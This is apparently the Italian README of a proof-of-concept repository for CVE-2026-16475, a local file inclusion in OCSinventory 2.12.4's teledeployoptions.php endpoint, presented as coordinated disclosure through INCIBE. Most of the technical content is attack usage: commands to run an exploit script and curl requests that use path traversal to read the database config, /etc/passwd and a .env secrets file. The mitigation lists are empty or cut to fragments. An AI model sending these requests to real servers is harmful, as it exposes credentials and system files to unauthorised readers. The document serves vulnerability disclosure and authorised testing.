
Questo è il repository ufficiale con il PoC della CVE-2026-16475, una LFI in OCSinventory 2.12.4.
Vulnerabilità di Local File Inclusion in OCSinventory 2.12.4
CVE ID: CVE-2026-16475
Punteggio CVSS: 6.9 (Medio)
CWE: CWE-98 (Controllo improprio del nome file per l'istruzione Include/Require in un programma PHP)
Versione interessata: OCSinventory 2.12.4
Stato: Corretto nelle versioni più recenti
Una vulnerabilità di Local File Inclusion (LFI) esiste nell'endpoint /ajax/teledeployoptions.php a causa di una sanitizzazione impropria del parametro linkedoptions prima del suo utilizzo in un'operazione dinamica di inclusione di file XML.
L'endpoint è progettato per caricare file di configurazione XML ma non riesce a validare correttamente il parametro linkedoptions, consentendo attacchi di path traversal.
Un attaccante remoto non autenticato può sfruttare questa vulnerabilità per:
pip install -r requirements.txt
python3 exploit.py -u http://target.com -v
Opzioni:
-u, --url - URL del target (obbligatorio)-v, --verbose - Output verboso-o, --output - Salva le letture riuscite su fileEsempio:
python3 exploit.py -u http://ocs.example.com -v -o results.txt
./lfi_test.sh
Modifica la variabile BASE_URL nello script:
BASE_URL="http://target.com/ajax/teledeployoptions.php"
# Read database config
curl "http://target/ajax/teledeployoptions.php?os=test&linkedoptions=../../../dbconfig.inc"
# Read passwd file
curl "http://target/ajax/teledeployoptions.php?os=test&linkedoptions=../../../../../../../../etc/passwd"
# Read environment file
curl "http://target/ajax/teledeployoptions.php?os=test&linkedoptions=../../../.env"
Per gli utenti:
Per gli sviluppatori:
basename() o funzioni simili per prevenire il path traversalNota: CVE-2026-16475 è coordinato tramite INCIBE e potrebbe non essere ancora indicizzato in NVD. Consulta la fonte INCIBE per informazioni autorevoli.
Solo per scopi educativi e test autorizzati
Vedi DISCLAIMER.md per l'informativa legale completa.
Adrián Ferrer Tarí
Divulgazione responsabile coordinata tramite INCIBE